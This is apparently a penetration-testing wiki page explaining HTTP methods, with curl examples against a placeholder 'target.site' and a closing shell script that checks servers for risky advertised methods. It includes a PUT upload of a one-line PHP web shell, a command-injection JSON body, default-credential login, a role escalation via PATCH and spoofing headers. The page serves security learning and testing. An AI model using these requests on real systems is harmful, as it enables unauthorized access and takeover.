= Making HTTP Requests =

== Introduction ==
HTTP requests are used to interact with web servers by requesting data, submitting forms, uploading files, or modifying resources. Understanding how each method works enables deeper interaction with web applications and can expose misconfigurations or unintended functionality. This page outlines how common HTTP methods are used in practice, with real-world examples suitable for exploration and testing.

== GET ==
The GET method is used to retrieve data from a server. It appends parameters to the URL and leaves traces in logs and browser history.

'''Usage Example'''
<pre>
curl 'http://target.site/profile?id=1337'
</pre>

'''Notes'''
* Used for parameter enumeration (?id=1, ?id=2, ...)
* Reflected and stored XSS often triggered via GET
* Sensitive data in GET can be exposed in logs or referers

== POST ==
The POST method submits data to the server in the request body. It's used in login forms, registration, comment submission, and more.

'''Usage Example (Form Login)'''
<pre>
curl -X POST http://target.site/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data "username=admin&password=admin"
</pre>

'''Usage Example (JSON)'''
<pre>
curl -X POST http://target.site/api \
  -H "Content-Type: application/json" \
  -d '{"cmd":"whoami"}'
</pre>

'''Notes'''
* Hidden parameters or roles often sent in POST
* Commonly used for SQL injection and command injection
* Some endpoints accept both GET and POST (test both)

== PUT ==
PUT is used to upload or replace resources. When enabled and not restricted, it may allow file upload attacks.

'''Usage Example (upload PHP shell)'''
<pre>
curl -X PUT http://target.site/uploads/shell.php \
  --data '<?php system($_GET["cmd"]); ?>'
</pre>

'''Notes'''
* Rarely enabled on production servers
* Can be used to gain arbitrary file write if not locked down
* Test using OPTIONS method to check for support

== DELETE ==
DELETE requests are meant to remove resources. While often blocked or protected, it can be misconfigured and abused.

'''Usage Example'''
<pre>
curl -X DELETE http://target.site/api/users/42
</pre>

'''Notes'''
* May not require authentication in misconfigured APIs
* If unauthenticated DELETE is accepted, privilege escalation or DoS may be possible

== PATCH ==
PATCH modifies part of a resource instead of replacing the whole. Seen in APIs that allow editing.

'''Usage Example'''
<pre>
curl -X PATCH http://target.site/api/user/42 \
  -H "Content-Type: application/json" \
  -d '{"role":"admin"}'
</pre>

'''Notes'''
* Can be used to escalate privileges in improperly secured APIs
* Input validation should always be tested

== HEAD ==
HEAD requests are identical to GET but return only headers. Useful for checking if a file exists or for recon.

'''Usage Example'''
<pre>
curl -I http://target.site/admin.php
</pre>

'''Notes'''
* Useful for testing resource existence without downloading content
* Can bypass some security tools that ignore HEAD requests

== OPTIONS ==
OPTIONS asks the server what methods are allowed on a given endpoint.

'''Usage Example'''
<pre>
curl -X OPTIONS http://target.site/api/
</pre>

'''Notes'''
* Helps detect hidden endpoints or misconfigured CORS policies
* Can reveal support for PUT, DELETE, etc.
* Some APIs respond differently based on user-agent

== TRACE ==
TRACE echoes the request back to the client. It can be abused in some edge-case attacks like Cross Site Tracing (XST).

'''Usage Example'''
<pre>
curl -X TRACE http://target.site
</pre>

'''Notes'''
* Rarely enabled
* If active, can reflect headers (e.g., cookies) in response

== Common Headers to Use in Requests ==
{| class="wikitable"
! Header !! Description
|-
| Host || Target domain
|-
| User-Agent || Client identity, can be spoofed
|-
| Referer || Previous page, can be manipulated
|-
| Origin || Cross-origin indicator (CORS)
|-
| Authorization || Basic or Bearer tokens
|-
| Content-Type || Declares body format (form, JSON, XML)
|-
| Cookie || Session identifier injection
|-
| X-Forwarded-For || Spoofed IP for bypassing IP-based restrictions
|}

== Tools for Crafting Requests ==
{| class="wikitable"
! Tool !! Use Case !! Notes
|-
| [[Tools/curl|curl]] || All HTTP methods || Lightweight, scriptable
|-
| [[Tools/httpie|httpie]] || Human-readable requests || Easier syntax than curl
|-
| [[Tools/burp|Burp Suite]] || Intercept & modify requests || GUI + repeater
|-
| [[Tools/zap|OWASP ZAP]] || Automated scanning + proxy || Supports scripting
|-
| [[Tools/postman|Postman]] || API testing & automation || GUI-based
|}

== See also ==
* /HTTP_Protocols
* Headers
* Cookies_and_Sessions
* curl
* Bypassing_Authentication
* Content_Discovery
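
The OPTIONS, PUT and TRACE notes above come down to one check an operator can run against their own servers: which state-changing or diagnostic methods does an endpoint advertise? The following is an added example, not part of the original page; the RISKY policy list, the function names and the sample response are constructed for illustration.

```shell
# Added example: report risky methods advertised in an OPTIONS response.
# Input: raw response headers on stdin, for instance from
#   curl -s -i -X OPTIONS https://your-server.example/api/   (placeholder URL)
# RISKY is an assumed policy list; adjust it to what each endpoint should accept.
RISKY="PUT DELETE PATCH TRACE"

risky_methods() {
  awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
    { sub(/\r$/, "") }                 # HTTP header lines end in CRLF
    /^$/ { exit }                      # blank line: headers are over, skip body
    {
      colon = index($0, ":")
      if (colon == 0) next             # status line, not a header
      name = tolower(substr($0, 1, colon - 1))   # header names are case-insensitive
      if (name != "allow" && name != "access-control-allow-methods") next
      m = split(toupper(substr($0, colon + 1)), parts, ",")
      for (i = 1; i <= m; i++) {
        gsub(/[ \t]/, "", parts[i])
        key = name ": " parts[i]
        # Report each header/method pair once, in order of appearance.
        if ((parts[i] in want) && !(key in seen)) { seen[key] = 1; print key }
      }
    }
  '
}

# Constructed sample: mixed-case method, a CORS header, and an "Allow:" line
# after the blank line that belongs to the body and must be ignored.
sample_response() {
  printf 'HTTP/1.1 204 No Content\r\n'
  printf 'Allow: GET, HEAD, put, OPTIONS, TRACE\r\n'
  printf 'Access-Control-Allow-Methods: GET, DELETE\r\n'
  printf '\r\n'
  printf 'Allow: PATCH\r\n'
}

sample_response | risky_methods
```

An empty result means neither header advertised a method from the policy list; it does not prove the server rejects those methods, since the Allow header is only what the server chooses to report.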